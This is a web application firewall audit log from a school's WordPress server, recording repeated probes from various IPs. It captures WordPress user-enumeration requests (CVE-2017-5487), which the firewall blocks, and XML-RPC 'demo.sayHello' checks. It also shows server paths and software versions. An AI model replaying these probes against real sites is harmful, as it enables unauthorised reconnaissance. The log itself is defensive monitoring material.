userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747422139344436 5647 (- - -) Stopwatch2: 1747422139344436 5647; combined=4140, p1=631, p2=3355, p3=21, p4=23, p5=64, sr=171, sw=46, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5741c62f-Z-- --360e891c-A-- [17/May/2025:02:04:00 +0700] aCeMIMe47ocjCGWTS4Y-2wAAAEI 103.236.140.4 53630 103.236.140.4 8181 --360e891c-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.242.33.213 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.33.213 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --360e891c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --360e891c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747422240394649 2985 (- - -) Stopwatch2: 1747422240394649 2985; combined=1299, p1=425, p2=839, p3=0, p4=0, p5=35, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --360e891c-Z-- --1bed7a20-A-- [17/May/2025:02:04:05 +0700] aCeMJce47ocjCGWTS4Y-3AAAAEg 103.236.140.4 53640 103.236.140.4 8181 --1bed7a20-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.242.33.213 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.33.213 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --1bed7a20-C-- demo.sayHello --1bed7a20-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --1bed7a20-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747422245804033 4827 (- - -) Stopwatch2: 1747422245804033 4827; combined=3735, p1=480, p2=3058, p3=23, p4=26, p5=87, sr=81, sw=61, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1bed7a20-Z-- --9949243f-A-- [17/May/2025:02:18:24 +0700] aCePgNe6THFz1hsaJaLZAgAAAA0 103.236.140.4 53718 103.236.140.4 8181 --9949243f-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 45.201.11.44 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 45.201.11.44 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --9949243f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9949243f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747423104029172 2800 (- - -) Stopwatch2: 1747423104029172 2800; combined=1268, p1=427, p2=811, p3=0, p4=0, p5=29, sr=76, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9949243f-Z-- --bf30a464-A-- [17/May/2025:02:18:31 +0700] aCePh9e6THFz1hsaJaLZAwAAABU 103.236.140.4 53722 103.236.140.4 8181 --bf30a464-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 45.201.11.44 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 45.201.11.44 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --bf30a464-C-- demo.sayHello --bf30a464-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --bf30a464-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747423111237158 6287 (- - -) Stopwatch2: 1747423111237158 6287; combined=4493, p1=592, p2=3703, p3=33, p4=37, p5=76, sr=79, sw=52, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --bf30a464-Z-- --fe650817-A-- [17/May/2025:02:20:04 +0700] aCeP5Ne6THFz1hsaJaLZBwAAABM 103.236.140.4 53732 103.236.140.4 8181 --fe650817-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.248.84.30 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.248.84.30 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --fe650817-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --fe650817-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747423204104348 3046 (- - -) Stopwatch2: 1747423204104348 3046; combined=1321, p1=423, p2=862, p3=0, p4=0, p5=36, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fe650817-Z-- --073f6729-A-- [17/May/2025:02:20:08 +0700] aCeP6NhEtho3ciA0wehdUwAAAIw 103.236.140.4 53736 103.236.140.4 8181 --073f6729-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.248.84.30 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.248.84.30 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --073f6729-C-- demo.sayHello --073f6729-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --073f6729-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747423208665623 6420 (- - -) Stopwatch2: 1747423208665623 6420; combined=4579, p1=649, p2=3695, p3=39, p4=41, p5=93, sr=80, sw=62, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --073f6729-Z-- --1b43c730-A-- [17/May/2025:02:21:14 +0700] aCeQKthEtho3ciA0wehdVQAAAIY 103.236.140.4 53740 103.236.140.4 8181 --1b43c730-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.233.72.21 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.72.21 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --1b43c730-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1b43c730-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747423274928630 3249 (- - -) Stopwatch2: 1747423274928630 3249; combined=1379, p1=486, p2=862, p3=0, p4=0, p5=31, sr=81, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1b43c730-Z-- --20d2b47f-A-- [17/May/2025:02:21:19 +0700] aCeQL9hEtho3ciA0wehdVgAAAIE 103.236.140.4 53744 103.236.140.4 8181 --20d2b47f-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.233.72.21 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.72.21 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --20d2b47f-C-- demo.sayHello --20d2b47f-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --20d2b47f-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747423279373619 5684 (- - -) Stopwatch2: 1747423279373619 5684; combined=4201, p1=567, p2=3412, p3=32, p4=35, p5=92, sr=79, sw=63, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --20d2b47f-Z-- --63e78e0c-A-- [17/May/2025:02:22:42 +0700] aCeQgthEtho3ciA0wehdWAAAAJQ 103.236.140.4 53748 103.236.140.4 8181 --63e78e0c-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.242.38.121 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.38.121 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --63e78e0c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --63e78e0c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747423362746433 3483 (- - -) Stopwatch2: 1747423362746433 3483; combined=1421, p1=474, p2=910, p3=0, p4=0, p5=37, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --63e78e0c-Z-- --7a389063-A-- [17/May/2025:02:22:49 +0700] aCeQidhEtho3ciA0wehdWgAAAJg 103.236.140.4 53752 103.236.140.4 8181 --7a389063-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.242.38.121 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.38.121 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --7a389063-C-- demo.sayHello --7a389063-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --7a389063-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747423369149590 5789 (- - -) Stopwatch2: 1747423369149590 5789; combined=4289, p1=613, p2=3452, p3=32, p4=36, p5=92, sr=78, sw=64, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7a389063-Z-- --95eb7850-A-- [17/May/2025:02:22:52 +0700] aCeQjNhEtho3ciA0wehdXAAAAIM 103.236.140.4 53756 103.236.140.4 8181 --95eb7850-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.189.218 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.189.218 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --95eb7850-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --95eb7850-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747423372507037 2773 (- - -) Stopwatch2: 1747423372507037 2773; combined=1246, p1=454, p2=763, p3=0, p4=0, p5=29, sr=117, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --95eb7850-Z-- --5d06de28-A-- [17/May/2025:02:22:57 +0700] aCeQkdhEtho3ciA0wehdXgAAAIU 103.236.140.4 53760 103.236.140.4 8181 --5d06de28-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.189.218 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.189.218 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --5d06de28-C-- demo.sayHello --5d06de28-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --5d06de28-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747423377101440 4600 (- - -) Stopwatch2: 1747423377101440 4600; combined=3560, p1=422, p2=2939, p3=24, p4=25, p5=89, sr=65, sw=61, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5d06de28-Z-- --c64ad754-A-- [17/May/2025:02:23:48 +0700] aCeQxNhEtho3ciA0wehdYAAAAIk 103.236.140.4 53770 103.236.140.4 8181 --c64ad754-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.94.13.21 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.94.13.21 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --c64ad754-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c64ad754-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747423428854549 2829 (- - -) Stopwatch2: 1747423428854549 2829; combined=1144, p1=382, p2=735, p3=0, p4=0, p5=27, sr=59, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c64ad754-Z-- --48f30b29-A-- [17/May/2025:02:23:54 +0700] aCeQyte6THFz1hsaJaLZCQAAABA 103.236.140.4 53774 103.236.140.4 8181 --48f30b29-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.94.13.21 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.94.13.21 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --48f30b29-C-- demo.sayHello --48f30b29-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --48f30b29-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747423434946088 5769 (- - -) Stopwatch2: 1747423434946088 5769; combined=4279, p1=566, p2=3492, p3=32, p4=36, p5=90, sr=78, sw=63, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --48f30b29-Z-- --5eb2a635-A-- [17/May/2025:02:24:27 +0700] aCeQ68e47ocjCGWTS4Y-4wAAAE4 103.236.140.4 53782 103.236.140.4 8181 --5eb2a635-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.79.49 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.79.49 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --5eb2a635-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5eb2a635-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747423467720238 3648 (- - -) Stopwatch2: 1747423467720238 3648; combined=1533, p1=533, p2=966, p3=0, p4=0, p5=33, sr=123, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5eb2a635-Z-- --995bc619-A-- [17/May/2025:02:24:34 +0700] aCeQ8thEtho3ciA0wehdZAAAAIg 103.236.140.4 53786 103.236.140.4 8181 --995bc619-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.79.49 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.79.49 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --995bc619-C-- demo.sayHello --995bc619-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --995bc619-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747423474885304 6379 (- - -) Stopwatch2: 1747423474885304 6379; combined=4563, p1=626, p2=3705, p3=37, p4=40, p5=93, sr=80, sw=62, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
